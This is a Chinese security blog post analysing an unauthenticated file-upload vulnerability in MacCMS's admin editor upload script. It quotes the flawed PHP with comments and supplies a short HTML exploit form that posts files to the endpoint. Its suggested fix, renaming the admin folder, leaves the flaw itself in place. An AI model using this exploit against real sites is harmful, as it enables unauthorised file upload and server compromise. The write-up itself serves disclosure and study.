maccms鸡肋上传漏洞及修复 - 网站安全 - 自学php

一小程序，无意间看到的顺便就看了下   ./admin/editor/upload.php           require_once ("admin_conn.php");         $action=be("get","action");         $ftypes=array('jpg','gif','bmp','png',".jpeg");         $upfileDir= "". $_SESSION["upfolder"] . "/" . getSavePicPath() . "/";         $maxSize=1000;         if(!file_exists($upfileDir)){                 mkdir($upfileDir);         }         foreach($_FILES as $FILEa){                 if(!in_array(substr($FILEa['name'],-3,3),$ftypes))                         $errm = "文件格式不正确1　[ <a href=# onclick=history.go(-1)>重新上传</a> ]"; //只是将消息存入一个变量 并没有showmsg and exit...                 if($FILEa['size']> $maxSize*1024)                         $errm = "文件大小超过了限制　[ <a onclick=history.go(-1)>重新上传</a> ]";                 if($FILEa['error'] !=0)                         $errm = "未知错误";                                 $targetDir= "". $_SESSION["upfolder"] . "/" . getSavePicPath() . "/"; //没有登录so session=null...                 $targetFile=date('Ymd').time().substr($FILEa['name'],-4,4);                 $realFile=$targetDir.$targetFile;                                 if(function_exists('move_uploaded_file')){                         move_uploaded_file($FILEa['tmp_name'],$realFile); //移动上传文件                         if(app_watermark==1){                                 imageWaterMark($targetDir.$targetFile,app_waterlocation,app_waterfont);                         }                         if($action=="xht"){                                 echo "{'err':'".$errm."','msg':'".app_installdir. replaceStr($upfileDir,"","").$targetFile."'}";                         }                         else{ //现在才die是不是迟了点？                                 die("<script>parent.document.getElementById('pic').value='".replaceStr($upfileDir,"","").$targetFile."'</script>");                         }                 }                 else{                         @copy($FILEa['tmp_name'],$realFile); //同上                         if(app_watermark==1){                                 imageWaterMark($targetDir.$targetFile,app_waterlocation,app_waterfont);                         }                         if($action=="xht"){                                 echo "{'err':'".$errm."','msg':'".app_installdir. replaceStr($upfileDir,"","").$targetFile."'}";                         }                         else{                                 die("<script>parent.document.getElementById('pic').value='".replaceStr($upfileDir,"","").$targetFile."'</script>");                         }                 }         } 为什么说他鸡肋呢，应为./admin/index.php      if(cururl.indexOf("/admin/") >0){alert('请将文件夹admin改名,避免被 黑客 入侵攻击');} so,我搜了下 大多数 （90%++）都修改了后台地址所以是鸡肋之处   exp   <body leftmargin=0 topmargin=0 style="font-size:11px"> <form name="form" enctype="multipart/form-data" action="http://www.2cto.com /www/mcms/admin/editor/upload.php" method="post"> <input type=file name=file1> <input type=submit name=submit value="上传"> </form> 上传之后直接查看源文件。。   作者 http://www.90sec.org/thread-1727-1-1. html www.2cto.com提供修复： 参考代码分析，后台一般不要默认地址

查看更多关于maccms鸡肋上传漏洞及修复 - 网站安全 - 自学php的详细内容...